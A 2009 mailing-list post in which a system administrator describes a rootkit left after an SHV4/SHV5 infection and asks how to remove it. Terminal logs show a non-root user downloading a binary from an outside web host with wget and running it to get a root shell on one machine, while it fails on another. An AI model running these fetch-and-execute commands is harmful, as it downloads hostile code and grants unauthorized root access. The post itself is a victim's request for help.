I have a rootkit installed on a bunch of machines that rkhunter does not find. This appears after infection with SHV4 / SHV5, which rkhunter found.

Here it works to allow a non-root user to become root

kric...@fricka:~$ mkdir a
kric...@fricka:~$ cd a
kric...@fricka:~/a$ ls -l
total 0
kric...@fricka:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:47:42-- http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886 6.88K/s in 1.0s

2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]

kric...@fricka:~/a$ chmod 777 a
kric...@fricka:~/a$ ./a
r...@fricka:~/a#

Here is a situation where it does not work

kric...@chichek:~$ mkdir a
kric...@chichek:~$ cd a
kric...@chichek:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:31:15-- http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886 37.8K/s in 0.2s

2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]

kric...@chichek:~/a$ chmod 777 a
kric...@chichek:~/a$ ./a
mmap: Permission denied

Does anybody here know how to delete this kit?

Cheers,

Thomas Krichel
http://openlib.org/home/krichel
RePEc:per:1965-06-05:thomas_krichel
skype: thomaskrichel